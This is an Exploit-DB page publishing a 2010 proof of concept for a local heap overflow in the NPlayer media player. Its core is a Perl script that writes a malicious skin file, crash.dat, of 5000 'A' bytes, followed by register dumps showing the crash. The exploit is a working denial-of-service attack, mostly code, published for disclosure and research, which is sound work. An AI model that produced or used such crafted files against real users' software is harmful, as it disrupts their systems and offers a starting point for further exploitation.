NPlayer - '.dat Skin' Local Heap Overflow (PoC)

EDB-ID:

11133

CVE:


EDB Verified:

Author:

Rehan Ahmed

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2010-01-13

Vulnerable App: 
#!/usr/bin/perl
#Exploit Title:NPlayer (.dat Skin File) Local Heap Overflow PoC
#Date:13/01/2010
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Tested On: WinXP SP2
########################################################################################
##EBX 41414141
##ESP 0012EF6C
##EBP 00DA50F8 ASCII "C:\Program Files\n.player\skins\crash.dat"
##ESI 0012EFD8
##EDI 014143F8
##EIP 7C90EAF0 ntdll.7C90EAF0
#######################################################################################
########################################################################################
my $boom="\x41" x 5000;
my $file="crash.dat";
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";
########################################################################################
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services